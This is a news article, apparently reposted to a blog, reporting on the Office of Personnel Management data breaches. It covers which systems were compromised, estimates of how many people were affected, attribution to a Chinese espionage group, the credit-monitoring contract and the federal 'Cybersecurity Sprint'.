Government officials have been vague in their testimony about the data breaches—there was apparently more than one—at the Office of Personnel Management. But on Thursday, officials from OPM, the Department of Homeland Security, and the Department of the Interior revealed new information that indicates at least two separate systems were compromised by attackers within OPM’s and Interior’s networks. The first was the Electronic Official Personnel Folder (eOPF) system, an entity hosted for OPM at the Department of the Interior’s shared service data center. The second was the central database behind EPIC, the suite of software used by OPM’s Federal Investigative Service in order to collect data for government employee and contractor background investigations.
OPM has not yet revealed the full extent of the data exposed by the attack, but initial actions by the agency in response to the breaches indicate information g as many as 3.2 million federal employees (both current federal employees and retirees) was exposed. However, new estimates in light of this week’s revelations have soared, estimating as many as 14 million people in and outside government will be affected by the breach—including uniformed military and intelligence personnel. It is, essentially, the biggest potential “doxing” in history. And if true, personal details from nearly everyone who works for the government in some capacity may now be in the hands of a foreign government. This fallout is the culmination of years of issues such as reliance on outdated software and contracting large swaths of security work elsewhere (including China).The OPM breaches themselves are cause for major concerns, but there are signs that these are not isolated incidents. “We see supporting evidence that these attacks are related to the group that launched the attack on Anthem [the large health insurer breached earlier this year],” said Tom Parker, chief technology officer of the information security company FusionX. “And there was a breach at United Airlines that’s potentially correlated as well.” When pulled together into an analytical database, the information could essentially become a LinkedIn for spies, providing a foreign intelligence organization with a way to find individuals with the right job titles, the right connections, and traits that might make them more susceptible to recruitment or compromise.
Preliminary evidence points to a group dubbed by Crowdstrike as “Deep Panda,” a Chinese cyber-espionage group. In the past, the group has used Windows PowerShell attacks to implant remote access tools (RATs) on Windows desktops and servers. It is this malware that investigators are believed to have discovered on OPM’s network and in the Department of the Interior’s data center.
Handing out bandages
The two systems breached were the Electronic Official Personnel Folder (eOPF) system, an entity hosted for OPM at the Department of the Interior’s shared service data center, and the central database behind “EPIC,” the suite of software used by OPM’s Federal Investigative Service in order to collect data for government employee and contractor background investigations.
Ars contacted both OPM and DHS while researching this story, but officials at both agencies refused to confirm or deny that these systems were part of the breach due to the ongoing investigation. However, sources familiar with OPM projects identified these systems as the ones most likely to be at the heart of the breaches.
In the weeks following the breach discovery, OPM officials scrambled to find a contractor to handle the “Privacy Act event.” The organization issued a call in late May and awarded a contract five days later (on June 2) to Winvale Group, a Washington, DC-based technology services company that also helps businesses sell services to the government. OPM classified the transaction as a blanket purchase agreement to allow for multiple additional purchases. The $20.8 million “first call” was for 3.2 million “units” of credit monitoring and identity theft recovery services, indicating the agency’s early assessment of how many individuals might have been affected by the breach.
The Winvale Group may get getting a lot more business based on OPM Director Katherine Archuleta’s statement to the House Government Oversight Committee this week. “In early May, the interagency incident response team shared with relevant agencies that the exposure of personnel records had occurred,” Archuleta said. “During the course of the ongoing investigation, the interagency incident response team concluded—later in May—that additional systems were likely compromised, also at an earlier date. This separate incident—which also predated deployment of our new security tools and capabilities—remains under investigation by OPM and our interagency partners. In early June, the interagency response team shared with relevant agencies that there was a high degree of confidence that OPM systems related to background investigations of current, former, and prospective Federal government employees, and those for whom a federal background investigation was conducted, may have been compromised.”
To date, OPM has no idea how many individuals’ background investigations were exposed. All Archuleta said was that the agency was “committed to notifying those individuals whose information may have been compromised as soon as practicable.”
In the meantime, the Obama administration has ordered a “30-day Cybersecurity Sprint.” Agencies must perform vulnerability testing and patch existing holes in security. They must prune the number of privileged user accounts and expand adoption of multifactor authentication for all systems. The Department of Defense and Intelligence Community have led the way on that last requirement, but many civilian agencies (such as OPM) have been slow to put in place.
Just how much this “sprint” will improve government security remains to be seen, especially since agencies such as OPM have been repeatedly warned in the past about minimum “security hygiene.” Thirty days is not likely enough time to correct a decade-plus of neglect of antiquated systems, poor leadership, and spotty attempts at modernization.
View the original content and more from this author here: http://ift.tt/1Cmr9hs
from hacker samurai http://ift.tt/1CnEINS
via IFTTT
No comments:
Post a Comment